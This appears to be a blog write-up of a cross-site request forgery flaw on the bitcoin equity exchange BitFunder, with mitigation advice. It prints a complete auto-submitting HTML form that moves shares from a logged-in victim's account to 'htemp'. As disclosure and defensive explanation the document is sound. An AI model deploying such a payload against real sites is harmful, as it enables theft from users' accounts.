BitFunder is one of the largest bitcoin equity exchanges. Users can quickly trade bitcoin-denominated equity in a market with significantly more liquidity than the bitcointalk.org forums, the primary alternative. BitFunder currently controls over $12 million in assets (the full table is at the end); the largest of these are AMC ($5.7M), Kenilworth ($4.7M), and ASICMINER ($4.5M). Additionally, BitFunder holds an undisclosed amount of BTC that users keep in their exchange wallets waiting to be invested.
<!-- Hidden form posting to BitFunder's transfer endpoint; the browser attaches the victim's session cookie -->
<form id="csrf" action="https://bitfunder.com/transfer" method="post">
<input type="hidden" name="asset" value="g.sdpt">
<input type="hidden" name="amount" value="100">
<input type="hidden" name="to_name" value="htemp">
</form>
<!-- Closing tag and auto-submit added to complete the fragment: the form is posted on page load, with no click needed -->
<script>document.getElementById("csrf").submit();</script>
The above HTML uses your current BitFunder session to send 100 shares of the asset "g.sdpt" to the account "htemp". The browser attaches your BitFunder session cookie to the cross-site POST, so a malicious user could embed this code on any web page to transfer shares to their own account: if you had BitFunder open, any site opened in another tab could have moved shares out of your account without you clicking anything. Two conditions had to hold for this to work: you were currently logged into your BitFunder account, and you had not enabled two factor authentication (with it enabled, the transfer requires a one-time code that the attacking page cannot supply).
BitFunder has been hesitant to issue a refund since the possibility of fraud is so high. It is difficult to determine whether HostRider's account was genuinely abused through this forgery or whether the shares were traded to htemp intentionally; from the server's side, a forged cross-site POST and a deliberate one look identical. When the transfer occurred, two factor authentication was not required to transfer shares. The day after this was discovered, BitFunder enabled two factor authentication for all share transfers by default. The attack could also be mitigated by issuing a CSRF token tied to each browser session and requiring it on every state-changing request such as /transfer: a page on another origin cannot read the token, so its forged form is rejected regardless of whether the user has two factor authentication enabled.
BitFunder should be treated like any other banking website. Users should enable two factor authentication whenever possible and log out of active sessions once their transactions are complete, since a forged request only works while a valid session cookie exists. Additionally, using a private browsing window (or a separate browser profile) for BitFunder keeps its session cookie out of the cookie jar that other sites you browse can trigger, which reduces the chance that another tab can act on your account. It remains to be seen whether similar loopholes exist on BitFunder for users who do not have these measures enabled, so this theft should serve as a lesson for all users to enable two factor authentication as soon as possible.